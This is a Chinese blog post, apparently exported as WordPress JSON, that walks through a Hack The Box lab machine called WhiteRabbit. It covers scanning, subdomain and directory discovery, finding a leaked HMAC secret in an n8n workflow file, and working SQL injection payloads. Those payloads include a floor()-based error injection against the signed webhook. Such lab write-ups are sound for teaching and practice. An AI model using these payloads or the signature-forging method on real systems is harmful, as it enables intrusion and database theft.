{"id":244,"date":"2025-04-09T19:16:08","date_gmt":"2025-04-09T11:16:08","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=244"},"modified":"2026-01-29T16:16:16","modified_gmt":"2026-01-29T08:16:16","slug":"244","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2025\/04\/09\/244\/","title":{"rendered":"HTB\u9776\u673a WhiteRabbit \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"
\n

\u76ee\u6807\u4fe1\u606f<\/h1>\n

IP\u5730\u5740\uff1a<\/strong>10.10.11.63<\/strong><\/code><\/p><\/blockquote>\n

\n

\u4fe1\u606f\u6536\u96c6<\/h1>\n

ICMP\u68c0\u6d4b<\/h2>\n
PING 10.10.11.63 (10.10.11.63) 56(84) bytes of data.\n64 bytes from 10.10.11.63: icmp_seq=1 ttl=63 time=473 ms\n64 bytes from 10.10.11.63: icmp_seq=2 ttl=63 time=394 ms\n64 bytes from 10.10.11.63: icmp_seq=3 ttl=63 time=519 ms\n64 bytes from 10.10.11.63: icmp_seq=4 ttl=63 time=439 ms\n\n--- 10.10.11.63 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3004ms\nrtt min\/avg\/max\/mdev = 393.766\/456.264\/519.014\/45.857 ms<\/code><\/pre>\n
\u653b\u51fb\u673a\u548c\u9776\u673a\u95f4\u7f51\u7edc\u8fde\u63a5\u826f\u597d\u3002<\/p>\n
\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n
# Nmap 7.95 scan initiated Sun Apr  6 08:15:41 2025 as: \/usr\/lib\/nmap\/nmap -sF -p- --min-rate 3000 -oN fin_result.txt 10.10.11.63\nNmap scan report for 10.10.11.63\nHost is up (0.32s latency).\nAll 65535 scanned ports on 10.10.11.63 are in ignored states.\nNot shown: 65535 open|filtered tcp ports (no-response)\n\n# Nmap done at Sun Apr  6 08:16:26 2025 -- 1 IP address (1 host up) scanned in 45.54 seconds<\/code><\/pre>\n
\u65e0\u6cd5\u63a2\u6d4b\u9776\u673a\u9632\u706b\u5899\u72b6\u6001\u3002<\/p>\n
\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n
TCP<\/strong><\/code>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
# Nmap 7.95 scan initiated Sun Apr  6 08:19:36 2025 as: \/usr\/lib\/nmap\/nmap -sT -sV -A -p- --min-rate 3000 -oN tcp_result.txt 10.10.11.63\nWarning: 10.10.11.63 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.11.63\nHost is up (0.31s latency).\nNot shown: 65492 closed tcp ports (conn-refused), 40 filtered tcp ports (no-response)\nPORT     STATE SERVICE VERSION\n22\/tcp   open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.9 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   256 0f:b0:5e:9f:85:81:c6:ce:fa:f4:97:c2:99:c5:db:b3 (ECDSA)\n|_  256 a9:19:c3:55:fe:6a:9a:1b:83:8f:9d:21:0a:08:95:47 (ED25519)\n80\/tcp   open  http    Caddy httpd\n|_http-title: Did not follow redirect to http:\/\/whiterabbit.htb\n2222\/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   256 c8:28:4c:7a:6f:25:7b:58:76:65:d8:2e:d1:eb:4a:26 (ECDSA)\n|_  256 ad:42:c0:28:77:dd:06:bd:19:62:d8:17:30:11:3c:87 (ED25519)\nDevice type: general purpose\nRunning: Linux 5.X\nOS CPE: cpe:\/o:linux:linux_kernel:5.0\nOS details: Linux 5.0, Linux 5.0 - 5.14\nNetwork Distance: 2 hops\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using proto 1\/icmp)\nHOP RTT       ADDRESS\n1   316.31 ms 10.10.14.1\n2   316.44 ms 10.10.11.63\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Sun Apr  6 08:20:40 2025 -- 1 IP address (1 host up) scanned in 64.49 seconds<\/code><\/pre>\n
UDP<\/strong><\/code>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
# Nmap 7.95 scan initiated Sun Apr  6 08:22:35 2025 as: \/usr\/lib\/nmap\/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.10.11.63\nWarning: 10.10.11.63 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.11.63\nHost is up (0.30s latency).\nAll 65535 scanned ports on 10.10.11.63 are in ignored states.\nNot shown: 65294 open|filtered udp ports (no-response), 241 closed udp ports (port-unreach)\n\n# Nmap done at Sun Apr  6 08:26:37 2025 -- 1 IP address (1 host up) scanned in 241.98 seconds<\/code><\/pre>\n
UDP<\/strong><\/code>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
\uff08\u65e0\uff09<\/code><\/pre>\n
\u53d1\u73b0\u9776\u673aWeb<\/code>\u670d\u52a1\u4e3b\u57df\u540d\u4e3awhiterabbit.htb<\/code>\uff0c\u64cd\u4f5c\u7cfb\u7edf\u4e3aUbuntu Linux<\/code>\uff0c\u540c\u65f6\u5b58\u572822\/ssh<\/code>\u548c2222\/ssh<\/code>\u4e24\u4e2aSSH<\/code>\u670d\u52a1\uff0c\u8ba4\u4e3a\u9776\u673a\u5f88\u6709\u53ef\u80fd\u5b58\u5728Docker<\/code>\u6216LXC<\/code>\u5bb9\u5668\u3002<\/p>\n
\n
\u670d\u52a1\u63a2\u6d4b<\/h1>\n
SSH\u670d\u52a1\uff0822\u7aef\u53e3\uff09<\/h2>\n
\u7aef\u53e3Banner<\/code>\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/megumin\/Documents\/whiterabbit\/nmap_reports]\n\u2514\u2500# nc -nv 10.10.11.63 22                                     \n(UNKNOWN) [10.10.11.63] 22 (ssh) open\nSSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.9<\/code><\/pre>\n
SSH\u670d\u52a1\uff082222\u7aef\u53e3\uff09<\/h2>\n
\u7aef\u53e3Banner<\/code>\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/megumin\/Documents\/whiterabbit\/nmap_reports]\n\u2514\u2500# nc -nv 10.10.11.63 2222\n(UNKNOWN) [10.10.11.63] 2222 (?) open\nSSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.5<\/code><\/pre>\n
Web\u5e94\u7528\u7a0b\u5e8f\uff0880\u7aef\u53e3\uff09<\/h2>\n
\u5b50\u57df\u540d\u63a2\u6d4b<\/h3>\n
\u5728\u5f00\u59cb\u5bf9Web<\/code>\u7ad9\u70b9\u9875\u9762\u548c\u76ee\u5f55\u7684\u63a2\u6d4b\u524d\uff0c\u9996\u5148\u4f7f\u7528wfuzz<\/code>\u914d\u5408\u5b57\u5178subdomains-top1million-110000.txt<\/code>\u8fdb\u884c\u5b50\u57df\u540d\u7206\u7834\u63a2\u6d4b\uff1a<\/p>\n
wfuzz -w \/usr\/share\/wordlists\/seclists\/Discovery\/DNS\/subdomains-top1million-110000.txt -u 10.10.11.63 -H \"Host: FUZZ.whiterabbit.htb\" -t 60 --hh 0 --hc 400<\/code><\/pre>\n
\"\"<\/p>\n
\u6210\u529f\u53d1\u73b0\u5b50\u57df\u540d\uff1astatus<\/code>\uff01<\/p>\n
\u4e3b\u7ad9<\/h3>\n
\u6253\u5f00\u7f51\u5740\uff1ahttp:\/\/whiterabbit.htb<\/code><\/p>\n
\"\"<\/p>\n
\u8be5\u7ad9\u70b9\u8c8c\u4f3c\u4e3a\u4e00\u5bb6\u7f51\u7edc\u5b89\u5168\u670d\u52a1\u516c\u53f8\u7684\u9759\u6001\u4ecb\u7ecd\u9875\u9762\uff0c\u9875\u9762\u4e0a\u63d0\u793a\u79f0\u8be5\u516c\u53f8\u5185\u90e8\u6b63\u5728\u6d4b\u8bd5\u4f7f\u7528n8n<\/code>\u81ea\u52a8\u5316\u5de5\u4f5c\u6d41\u7ba1\u7406\u5de5\u5177\uff0c\u9664\u6b64\u4e4b\u5916\u6ca1\u6709\u53d1\u73b0\u5176\u5b83\u4fe1\u606f\u3002<\/p>\n
\u5c1d\u8bd5\u8fdb\u884c\u76ee\u5f55\u626b\u63cf\uff0c\u9664index.html<\/code>\u5916\u672a\u53d1\u73b0\u5176\u5b83\u76ee\u5f55\u548c\u7f51\u9875\u3002<\/p>\n
status\u65c1\u7ad9<\/h3>\n
\u6253\u5f00\u7f51\u5740\uff1ahttp:\/\/status.whiterabbit.htb\/<\/code><\/p>\n
\"\"<\/p>\n
\u53d1\u73b0\u9776\u673a\u90e8\u7f72\u4e86Uptime Kuma<\/code>\u7f51\u7ad9\u72b6\u6001\u76d1\u63a7\u7cfb\u7edf\u3002<\/p>\n
\u5c1d\u8bd5\u8054\u7f51\u641c\u7d22\u8be5\u7cfb\u7edf\u6f0f\u6d1e\uff0c\u53d1\u73b0\u51e0\u4e4e\u5168\u90e8\u6f0f\u6d1e\u5747\u9700\u8981\u767b\u5f55\u540e\u5229\u7528\uff0c\u5c11\u90e8\u5206\u672a\u6388\u6743\u6f0f\u6d1e\u5229\u7528\u5931\u8d25\u3002<\/p>\n
\u5c1d\u8bd5\u626b\u63cf\u76ee\u5f55\uff1a<\/p>\n
# Dirsearch started Sun Apr  6 10:25:39 2025 as: \/usr\/lib\/python3\/dist-packages\/dirsearch\/dirsearch.py -u http:\/\/status.whiterabbit.htb -x 400,403,404 -t 60 -e js,ts,html,txt,zip,tar.gz,xml,json,pcap,yaml\n\n301   179B   http:\/\/status.whiterabbit.htb\/assets    -> REDIRECTS TO: \/assets\/\n200    15KB  http:\/\/status.whiterabbit.htb\/favicon.ico\n200   415B   http:\/\/status.whiterabbit.htb\/manifest.json\n401     0B   http:\/\/status.whiterabbit.htb\/metrics\n401     0B   http:\/\/status.whiterabbit.htb\/metrics\/\n200    25B   http:\/\/status.whiterabbit.htb\/robots.txt\n301   189B   http:\/\/status.whiterabbit.htb\/screenshots    -> REDIRECTS TO: \/screenshots\/\n301   179B   http:\/\/status.whiterabbit.htb\/Upload    -> REDIRECTS TO: \/Upload\/\n301   179B   http:\/\/status.whiterabbit.htb\/upload    -> REDIRECTS TO: \/upload\/<\/code><\/pre>\n
\u8bbf\u95eerobots.txt<\/code>\uff0c\u53d1\u73b0\u6587\u4ef6\u5185\u6ca1\u6709\u4efb\u4f55\u6709\u6548\u5185\u5bb9\u3002\/metrics<\/code>\u7aef\u70b9\u4e3a\u9700\u8981\u6388\u6743\u7684API<\/code>\u63a5\u53e3\uff0c\u6682\u65f6\u65e0\u6cd5\u8bbf\u95ee\u3002<\/p>\n
\u8bbf\u95ee\u5269\u4e0b\u7684\/assets<\/code>\u3001\/screenshots<\/code>\u548c\/upload<\/code>\u76ee\u5f55\uff0c\u53d1\u73b0\u524d\u4e24\u4e2aURL<\/code>\u8fd4\u56deUptime Kuma<\/code>\u7684404<\/code>\u9875\u9762\uff0c\u800c\u6700\u540e\/upload<\/code>\u76ee\u5f55\u8fd4\u56de\u7684\u5374\u662f\u7a7a\u767d404<\/code>\u9875\u9762\uff1a<\/p>\n
\"\"<\/p>\n
\u6000\u7591\/upload<\/code>\u76ee\u5f55\u4e3a\u9776\u673aWeb<\/code>\u670d\u52a1\u6839\u76ee\u5f55\u4e2d\u4e00\u4e2a\u771f\u5b9e\u5b58\u5728\u7684\u5b50\u76ee\u5f55\uff0c\u53ea\u4e0d\u8fc7\u8bbf\u95ee\u5b50\u76ee\u5f55\u65f6\u9ed8\u8ba4\u7684\u54cd\u5e94\u7801403<\/code>\u88ab\u4eba\u4e3a\u4fee\u6539\u4e3a\u4e86404<\/code>\u3002\u5c1d\u8bd5\u5bf9\u8be5\u76ee\u5f55\u8fdb\u884c\u626b\u63cf\uff0c\u4f46\u672a\u53d1\u73b0\u4efb\u4f55\u4fe1\u606f\u3002<\/p>\n
\n
\u6e17\u900f\u6d4b\u8bd5<\/h1>\n
\u641c\u7d22Web\u5e94\u7528\u6e90\u4ee3\u7801\u53d1\u73b0\u5173\u952e\u7aef\u70b9<\/h2>\n
\u5728\u670d\u52a1\u63a2\u6d4b\u9636\u6bb5\uff0c\u6211\u4eec\u5bf9\u9776\u673aWeb<\/code>\u670d\u52a1\u7684\u4e24\u4e2a\u7ad9\u70b9\u8fdb\u884c\u4e86\u76ee\u5f55\u626b\u63cf\u548c\u6f0f\u6d1e\u641c\u7d22\uff0c\u4f46\u5747\u672a\u53d1\u73b0\u4efb\u4f55\u4fe1\u606f\u3002\u540c\u65f6\u6211\u4eec\u8fd8\u53d1\u73b0\uff0c\u5bf9\u4e8eUptime Kuma<\/code>\u7f51\u7ad9\u76d1\u6d4b\u7cfb\u7edf\uff0c\u5982\u679c\u653b\u51fb\u8005\u8bbf\u95ee\u4e00\u4e2a\u5b9e\u9645\u4e0a\u4e0d\u5b58\u5728\u7684API<\/code>\u7aef\u70b9\u6216\u76ee\u5f55\uff0c\u90a3\u4e48\u7cfb\u7edf\u5c31\u4f1a\u8fd4\u56deUptime Kuma<\/code>\u81ea\u5b9a\u4e49\u7684404<\/code>\u9875\u9762\uff1b\u4f46\u5982\u679c\u653b\u51fb\u8005\u8bbf\u95ee\u7684\u76ee\u5f55\u6216\u7aef\u70b9\u786e\u5b9e\u5b58\u5728\uff0c\u4f46\u76ee\u5f55\u672a\u5f00\u542f\u76ee\u5f55\u5217\u8868\u529f\u80fd\u65f6\uff0c\u7cfb\u7edf\u5c31\u4f1a\u8fd4\u56de\u7a7a\u767d\u7684404<\/code>\u9875\u9762\u3002<\/p>\n
\u5bf9\u4e8e\u8fd9\u79cd\u60c5\u51b5\uff0c\u8981\u60f3\u786e\u5b9a\u76ee\u6807\u7cfb\u7edf\u5230\u5e95\u5b58\u5728\u54ea\u4e9bWeb API<\/code>\u7aef\u70b9\uff0c\u6548\u7387\u6700\u5feb\u7684\u65b9\u6cd5\u5c31\u662f\u5728GitHub<\/code>\u4e0a\u641c\u7d22\u76ee\u6807\u7cfb\u7edf\u6e90\u4ee3\u7801\u4e2d\u7684\u8def\u7531\u5b9a\u4e49\u8bed\u53e5\u3002\u4e00\u822c\u60c5\u51b5\u4e0b\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7route<\/code>\u5173\u952e\u8bcd\u627e\u5230\u8fd9\u4e9b\u4ee3\u7801\u3002<\/p>\n
\u6253\u5f00Uptime Kuma<\/code>\u7684GitHub<\/code>\u9879\u76ee\u754c\u9762\uff1alouislam\/uptime-kuma: A fancy self-hosted monitoring tool<\/a>\uff0c\u5728\u641c\u7d22\u680f\u4e2d\u8f93\u5165repo:louislam\/uptime-kuma route<\/code>\u5e76\u56de\u8f66\uff1a<\/p>\n
\"\"<\/p>\n
\u901a\u8fc7\u67e5\u9605\u90e8\u5206\u6e90\u4ee3\u7801\uff0c\u6211\u4eec\u53ef\u4ee5\u53d1\u73b0\uff0c\u5728Uptime Kuma<\/code>\u4e2d\uff0c\u91cd\u5b9a\u5411\u8bf7\u6c42\u5230\u6307\u5b9aAPI<\/code>\u7aef\u70b9\u7684Vue<\/code>\u65b9\u6cd5\u901a\u5e38\u4e3a\uff1athis.$router.push<\/code>\u3002\u6211\u4eec\u53ef\u4ee5\u7ee7\u7eed\u5728\u6e90\u4ee3\u7801\u4e2d\u641c\u7d22\u8be5\u65b9\u6cd5\uff0c\u4ee5\u83b7\u53d6\u5c3d\u53ef\u80fd\u591a\u7684API<\/code>\u7aef\u70b9\u540d\u79f0\uff1arepo:louislam\/uptime-kuma this.$router.push<\/code><\/p>\n
\"\"<\/p>\n
\u53ef\u4ee5\u770b\u5230\u6210\u529f\u641c\u7d22\u51fa\u4e86\u591a\u4e2aAPI<\/code>\u7aef\u70b9\u540d\u79f0\u3002\u6211\u4eec\u5bf9\u5176\u8fdb\u884c\u6574\u7406\u6c47\u603b\uff0c\u7ed3\u679c\u5982\u4e0b\uff1a<\/p>\n
\/status\n\/setup\n\/settings\n\/maintenance<\/code><\/pre>\n
\u76f4\u63a5\u9010\u4e2a\u8bbf\u95ee\u4ee5\u4e0a\u7aef\u70b9\uff0c\u53d1\u73b0\u9664\u4e86\u8bbf\u95ee\/status<\/code>\u7aef\u70b9\u8fd4\u56de\u7684\u662f\u7a7a\u767d404<\/code>\u9875\u9762\u5916\uff0c\u5176\u5b83\u7aef\u70b9\u7684\u8bbf\u95ee\u7ed3\u679c\u5168\u90e8\u88abUptime Kuma<\/code>\u6e32\u67d3\u6210\u4e86\u767b\u5f55\u9875\u9762\uff1a<\/p>\n
\"\"<\/p>\n
\u6000\u7591\/status<\/code>\u4e3a\u6709\u6548\u7aef\u70b9\uff0c\u4e14\u53ef\u4ee5\u5728\u672a\u6388\u6743\u60c5\u51b5\u4e0b\u8bbf\u95ee\u3002\u76f4\u63a5\u5c1d\u8bd5\u626b\u63cf\u76ee\u5f55\uff1a<\/p>\n
# Dirsearch started Sun Apr  6 20:21:32 2025 as: \/usr\/lib\/python3\/dist-packages\/dirsearch\/dirsearch.py -u http:\/\/status.whiterabbit.htb\/status -x 404 -t 60 -e js,yml,html,txt,zip,tar.gz,json,db,yaml,pdf,md --exclude-sizes=2KB\n\n200     3KB  http:\/\/status.whiterabbit.htb\/status\/temp<\/code><\/pre>\n
\u6210\u529f\u53d1\u73b0\u63a5\u53e3\u7aef\u70b9\/status\/temp<\/code>\uff01\u5c1d\u8bd5\u8bbf\u95ee\uff1a<\/p>\n
\"\"<\/p>\n
\u53d1\u73b0\u4e3aUptime Kuma<\/code>\u7f13\u5b58\u7684\u7f51\u7ad9\u72b6\u6001\u6d4b\u8bd5\u7ed3\u679c\uff0c\u4e14\u5305\u542b\u65b0\u7684\u865a\u62df\u4e3b\u673a\u540d\uff1addb09a8558c9.whiterabbit.htb<\/code>\u548ca668910b5514e.whiterabbit.htb<\/code>\uff01<\/p>\n
\u76f4\u63a5\u5c06\u4e0a\u8ff0\u65b0\u865a\u62df\u4e3b\u673a\u540d\u5199\u5165hosts<\/code>\u6587\u4ef6\u4e2d\uff0c\u5e76\u8fdb\u884c\u4e0b\u4e00\u6b65\u679a\u4e3e\u63a2\u6d4b\u3002<\/p>\n
\u67e5\u9605WiKi\u6587\u6863\u53d1\u73b0WebHook\u6f0f\u6d1e<\/h2>\n
\u6211\u4eec\u9996\u5148\u8bbf\u95ee\u4e24\u4e2a\u65b0\u53d1\u73b0\u7684\u865a\u62df\u4e3b\u673a\u540d\uff0c\u638c\u63e1\u5176\u57fa\u672c\u60c5\u51b5\u3002<\/p>\n
\u9996\u5148\u6253\u5f00GoPhish<\/code>\u7f51\u9875\u5730\u5740\uff1ahttp:\/\/ddb09a8558c9.whiterabbit.htb\/<\/code><\/p>\n
\"\"<\/p>\n
\u786e\u5b9a\u8be5\u7ad9\u70b9\u8fd0\u884c\u4e86GoPhish<\/code>\u793e\u4f1a\u5de5\u7a0b\u5b66\u8f85\u52a9\u7cfb\u7edf\u3002<\/p>\n
\u63a5\u7740\u8bbf\u95eeWiKi<\/code>\u7ad9\u70b9\uff1ahttp:\/\/a668910b5514e.whiterabbit.htb\/<\/code><\/p>\n
\"\"<\/p>\n
\u5728\u5de6\u4fa7\u8bcd\u6761\u5217\u8868\u4e2d\u53d1\u73b0\u5b58\u5728GoPhish Webhooks<\/code>\u4e00\u9879\uff0c\u70b9\u51fb\u67e5\u770b\uff1a<\/p>\n
\"\"<\/p>\n
\u53d1\u73b0\u8be5\u8bcd\u6761\u4e3aGoPhish WebHook<\/code>\u7684\u8be6\u7ec6\u8bf4\u660e\u3002\u901a\u8bfb\u5168\u6587\uff0c\u53d1\u73b0\u8be5WebHook<\/code>\u662f\u57fa\u4e8en8n<\/code>\u81ea\u52a8\u5316\u5de5\u4f5c\u6d41\u5de5\u5177\u5b9e\u73b0\u7684\u3002\u7528\u6237\u9996\u5148\u9700\u8981\u53d1\u9001\u8bf7\u6c42\u5230n8n<\/code>\u7ad9\u70b9\uff0c\u518d\u7531n8n<\/code>\u5de5\u5177\u6839\u636e\u4e8b\u5148\u5b9a\u4e49\u597d\u7684\u5de5\u4f5c\u6d41\u7a0b\u5e8f\uff0c\u5411MySQL<\/code>\u6570\u636e\u5e93\u53d1\u9001\u67e5\u8be2\u8bf7\u6c42\uff0c\u6700\u540e\u628a\u7ed3\u679c\u8fd4\u56de\u7ed9\u7528\u6237\u3002\u6587\u6863\u4e2d\u8bb0\u5f55\u4e86\u4e00\u4e2aHTTP<\/code>\u8bf7\u6c42\u793a\u4f8b\uff1a<\/p>\n
POST \/webhook\/d96af3a4-21bd-4bcb-bd34-37bfc67dfd1d HTTP\/1.1\nHost: 28efa8f7df.whiterabbit.htb\nx-gophish-signature: sha256=cf4651463d8bc629b9b411c58480af5a9968ba05fca83efa03a21b2cecd1c2dd\nAccept: *\/*\nAccept-Encoding: gzip, deflate, br\nConnection: keep-alive\nContent-Type: application\/json\nContent-Length: 81\n\n{\n  \"campaign_id\": 1,\n  \"email\": \"test@ex.com\",\n  \"message\": \"Clicked Link\"\n}<\/code><\/pre>\n
\u4ece\u8bf7\u6c42\u793a\u4f8b\u4e2d\uff0c\u6211\u4eec\u53ef\u4ee5\u53d1\u73b0n8n<\/code>\u7ad9\u70b9\u7684\u865a\u62df\u4e3b\u673a\u540d\u4e3a\uff1a28efa8f7df.whiterabbit.htb<\/code>\uff0c\u5c06\u5176\u8bb0\u5f55\u5230hosts<\/code>\u6587\u4ef6\u4e2d\u3002<\/p>\n
\u540c\u65f6\uff0c\u6211\u4eec\u8fd8\u53d1\u73b0\u4e86\u8bf7\u6c42\u5934\u4e2d\u5b58\u5728x-gophish-signature<\/code>\u9879\uff0c\u6839\u636eSecurity Mechanism: Signature Verification<\/code>\u5c0f\u8282\u7684\u8bf4\u660e\uff0c\u6211\u4eec\u53ef\u4ee5\u5f97\u77e5\u8be5\u9879\u5185\u5bb9\u4e3aHMAC-SHA256<\/code>\u54c8\u5e0c\u503c\uff0c\u7528\u4e8e\u8fdb\u884c\u8eab\u4efd\u9a8c\u8bc1\u3002\u5f53\u5bf9WebHook<\/code>\u8fdb\u884c\u8c03\u7528\u65f6\uff0c\u5ba2\u6237\u7aef\u9700\u8981\u4f7f\u7528\u9884\u5148\u5b9a\u4e49\u597d\u7684\u5bc6\u94a5\u503c\uff0c\u901a\u8fc7\u54c8\u5e0c\u7b97\u6cd5\u52a0\u5bc6HTTP POST<\/code>\u7684JSON<\/code>\u8bf7\u6c42\u4f53\u5185\u5bb9\uff0c\u5c06\u5176\u4f5c\u4e3ax-gophish-signature<\/code>\u8bf7\u6c42\u5934\u7684\u503c\u53d1\u9001\uff1a<\/p>\n
The x-gophish-signature in each request plays a crucial role in ensuring the integrity and security of the data received by n8n. This HMAC (Hash-Based Message Authentication Code) signature is generated by hashing the body of the request along with a secret key. The workflow\u2019s verification of this signature ensures that the messages are not only intact but also are sent from an authorized source, significantly mitigating the risk of spoofed events for example SQLi attempts.<\/code><\/pre>\n
\u9664\u6b64\u4e4b\u5916\uff0c\u7f51\u9875\u8fd8\u63d0\u4f9b\u4e86\u4e00\u4efdgophish_to_phishing_score_database.json<\/code>\u6587\u4ef6\uff0c\u5185\u5bb9\u4f3c\u4e4e\u4e3a\u6574\u4e2a\u5de5\u4f5c\u6d41\u7684n8n<\/code>\u7a0b\u5e8f\u5b9a\u4e49\uff1a<\/p>\n
\"\"<\/p>\n
\u76f4\u63a5\u5355\u51fb\u4e0b\u8f7d\u8be5\u6587\u4ef6\uff0c\u6253\u5f00\u67e5\u770b\uff1a<\/p>\n
\"\"<\/p>\n
\u5728\u7b2c337 - 362<\/code>\u884c\u5904\uff0c\u53d1\u73b0\u8be5\u5de5\u4f5c\u6d41\u7591\u4f3c\u5b58\u5728SQL<\/code>\u6ce8\u5165\u6f0f\u6d1e\u3002\u8be5\u5de5\u4f5c\u6d41\u5728\u63a5\u6536\u5230\u53d1\u9001\u7684\u7535\u5b50\u90ae\u7bb1\u540d\u79f0\u53c2\u6570$json.body.email<\/code>\u540e\uff0c\u4f1a\u5728\u6570\u636e\u5e93\u8bb0\u5f55\u4e2d\u67e5\u8be2\u8be5\u7535\u5b50\u90ae\u7bb1\uff0c\u800cn8n<\/code>\u5de5\u4f5c\u6d41\u7a0b\u5e8f\u4f3c\u4e4e\u672a\u5bf9\u8bf7\u6c42\u4e2d\u7684\u5f15\u53f7\u5b57\u7b26\u8fdb\u884c\u8f6c\u4e49\uff0c\u5c31\u76f4\u63a5\u8fdb\u884c\u4e86SELECT<\/code>\u67e5\u8be2\u64cd\u4f5c\uff1a<\/p>\n
    {\n      \"parameters\": {\n        \"operation\": \"executeQuery\",\n        \"query\": \"SELECT * FROM victims where email = \"{{ $json.body.email }}\" LIMIT 1\",\n        \"options\": {}\n      },\n      \"id\": \"5929bf85-d38b-4fdd-ae76-f0a61e2cef55\",\n      \"name\": \"Get current phishing score\",\n      \"type\": \"n8n-nodes-base.mySql\",\n      \"typeVersion\": 2.4,\n      \"position\": [\n        1380,\n        260\n      ],\n      \"alwaysOutputData\": true,\n      \"retryOnFail\": false,\n      \"executeOnce\": false,\n      \"notesInFlow\": false,\n      \"credentials\": {\n        \"mySql\": {\n          \"id\": \"qEqs6Hx9HRmSTg5v\",\n          \"name\": \"mariadb - phishing\"\n        }\n      },\n      \"onError\": \"continueErrorOutput\"\n    }<\/code><\/pre>\n
\u9664\u6b64\u4e4b\u5916\uff0c\u8fd8\u5728\u7b2c275 - 291<\/code>\u884c\u5904\u53d1\u73b0\u4e86\u7528\u4e8e\u52a0\u5bc6\u751f\u6210x-gophish-signature<\/code>\u503c\u7684HMAC-SHA256<\/code>\u5bc6\u94a5\uff1a<\/p>\n
{\n      \"parameters\": {\n        \"action\": \"hmac\",\n        \"type\": \"SHA256\",\n        \"value\": \"={{ JSON.stringify($json.body) }}\",\n        \"dataPropertyName\": \"calculated_signature\",\n        \"secret\": \"3CWVGMndgMvdVAzOjqBiTicmv7gxc6IS\"\n      },\n      \"id\": \"e406828a-0d97-44b8-8798-6d066c4a4159\",\n      \"name\": \"Calculate the signature\",\n      \"type\": \"n8n-nodes-base.crypto\",\n      \"typeVersion\": 1,\n      \"position\": [\n        860,\n        340\n      ]\n    }<\/code><\/pre>\n
\u5bc6\u94a5\u4e3a\uff1a3CWVGMndgMvdVAzOjqBiTicmv7gxc6IS<\/code>\u3002<\/p>\n
SQL\u6ce8\u5165\u653b\u51fbn8n\u5de5\u4f5c\u6d41\u7a0b\u5e8f<\/h2>\n
\u6839\u636e\u4e0a\u8ff0\u6536\u96c6\u5230\u7684\u4fe1\u606f\uff0c\u6211\u4eec\u53ef\u4ee5\u76f4\u63a5\u5bf9n8n<\/code>\u5de5\u4f5c\u6d41\u8fdb\u884cSQL<\/code>\u6ce8\u5165\u653b\u51fb\u3002\u9996\u5148\uff0c\u6211\u4eec\u6253\u5f00http:\/\/28efa8f7df.whiterabbit.htb\/webhook\/d96af3a4-21bd-4bcb-bd34-37bfc67dfd1d<\/code>\u7f51\u5740\uff0c\u968f\u540e\u4f7f\u7528BurpSuite<\/code>\u62e6\u622a\u6d4f\u89c8\u5668\u7f51\u7edc\u8bf7\u6c42\uff0c\u5c06\u8bf7\u6c42\u5185\u5bb9\u66ff\u6362\u4e3aWiKi<\/code>\u6587\u6863\u4e2d\u7684WebHook<\/code>\u8bf7\u6c42\u793a\u4f8b\uff0c\u53d1\u9001\u786e\u8ba4\u8be5\u5de5\u4f5c\u6d41\u662f\u5426\u53ef\u7528\uff1a<\/p>\n
\"\"<\/p>\n
\u786e\u8ba4\u8be5\u5de5\u4f5c\u6d41\u53ef\u7528\uff01<\/p>\n
\u63a5\u4e0b\u6765\u6784\u9020SQLi<\/code>\u6f0f\u6d1e\u6d4b\u8bd5\u8bf7\u6c42\uff0c\u5e76\u6839\u636e\u5bc6\u94a5\u751f\u6210\u5176HMAC-SHA256<\/code>\u54c8\u5e0c\u503c\uff0c\u4fee\u6539x-gophish-signature<\/code>\u5934\u53d1\u9001\u3002\uff08\u53ef\u901a\u8fc7\u5728\u7ebf\u5de5\u5177\u8fdb\u884c\u54c8\u5e0c\u751f\u6210\uff1a\u5728\u7ebfHMAC\u8ba1\u7b97\u5de5\u5177<\/a>\uff09\u6ce8\u610fJSON<\/code>\u4e2d\u6bcf\u4e2a\u952e\u6216\u503c\u4e4b\u95f4\u4e0d\u80fd\u5b58\u5728\u7a7a\u683c\uff1a<\/p>\n
{\"campaign_id\":1,\"email\":\"misaka19008@test.com\\\"\",\"message\":\"Clicked Link\"}<\/code><\/pre>\n
\"\"<\/p>\n
\"\"<\/p>\n
\u6210\u529f\u53d1\u73b0SQL<\/code>\u6ce8\u5165\u6f0f\u6d1e\uff01\u63a5\u4e0b\u6765\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528floor()<\/code>\u51fd\u6570\u8fdb\u884c\u62a5\u9519\u6ce8\u5165\uff0c\u83b7\u53d6\u5f53\u524d\u6570\u636e\u5e93\u7248\u672c\u3001\u5f53\u524d\u7528\u6237\u540d\u548c\u5e93\u540d\uff1a<\/p>\n
{\"campaign_id\":1,\"email\":\"misaka19008@test.com\\\" union select count(*),concat(floor(rand(0)*2),'(==>)',(select concat_ws(0x20,version(),user(),database()))) as x from information_schema.schemata group by x-- -\",\"message\":\"Clicked Link\"}<\/code><\/pre>\n
\"\"<\/p>\n
